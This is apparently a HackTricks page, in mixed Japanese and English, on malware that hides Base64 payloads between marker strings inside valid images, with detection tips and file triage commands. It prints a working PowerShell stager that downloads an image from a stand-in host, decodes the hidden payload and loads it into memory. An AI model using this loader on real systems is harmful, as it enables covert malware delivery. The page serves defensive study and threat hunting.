Malware & Network Stego

Tip

AWSハッキングを学び、実践する：HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する：HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する：HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

• サブスクリプションプランを確認してください！
• **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
• HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。

すべての steganography が pixel LSB というわけではありません。commodity malware は、有効なファイル内に payload を隠すことがよくあります。

実用的なパターン

有効な画像内のマーカー区切りのpayloads

画像がダウンロードされ、スクリプトによって即座に text/Base64 として解析される場合、payload は pixel-hidden よりもマーカー区切りであることが多いです。

Commodity loaders はますます Base64 payloads を plain text として有効な画像（often GIF/PNG）の中に隠します。pixel-level LSB の代わりに、payload はファイルの text/metadata に埋め込まれたユニークなマーカー文字列で区切られます。A stager は次のように動作します:

• Downloads the image over HTTP(S)
• Locates start/end markers
• Extracts the between-text and Base64-decodes it
• Loads/executes in-memory

最小限の PowerShell carving snippet:

$img = (New-Object Net.WebClient).DownloadString('https://example.com/p.gif')
$start = '<<sudo_png>>'; $end = '<<sudo_odt>>'
$s = $img.IndexOf($start); $e = $img.IndexOf($end)
if($s -ge 0 -and $e -gt $s){
$b64 = $img.Substring($s + $start.Length, $e - ($s + $start.Length))
$bytes = [Convert]::FromBase64String($b64)
[Reflection.Assembly]::Load($bytes) | Out-Null
}

Notes:

• ATT&CK: T1027.003 (steganography)
• 検出/ハンティング:
• ダウンロードした画像を区切り文字列でスキャンする。
• 画像を取得してすぐに Base64 デコードルーチン（PowerShell FromBase64String, JS atob, etc）を呼ぶスクリプトにフラグを立てる。
• HTTP の content-type の不一致を探す（image/* レスポンスだがボディが長い ASCII/Base64 を含む、など）。

Other high-signal places to hide payloads

These are typically faster to check than content-level pixel stego:

• メタデータ: EXIF/XMP/IPTC, PNG tEXt/iTXt/zTXt, JPEG COM/APPn segments.
• 末尾のバイト: 正式な終了マーカーの後に追加されたデータ（例: PNG IEND の後）。
• 埋め込みアーカイブ: ZIP/7z が埋め込まれているか追加されていて、ローダーにより展開される。
• Polyglots: 複数のパーサで有効になるよう作られたファイル（例: image + script + archive）。

トリアージコマンド

file sample
exiftool -a -u -g1 sample
strings -n 8 sample | head
binwalk sample
binwalk -e sample

参考資料:

• Unit 42 の例: https://unit42.paloaltonetworks.com/phantomvai-loader-delivers-infostealers/
• MITRE ATT&CK: https://attack.mitre.org/techniques/T1027/003/
• File format polyglots and container tricks: https://github.com/corkami/docs
• Aperi’Solve (web-based stego triage): https://aperisolve.com/

Tip

AWSハッキングを学び、実践する：HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する：HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する：HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

• サブスクリプションプランを確認してください！
• **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
• HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。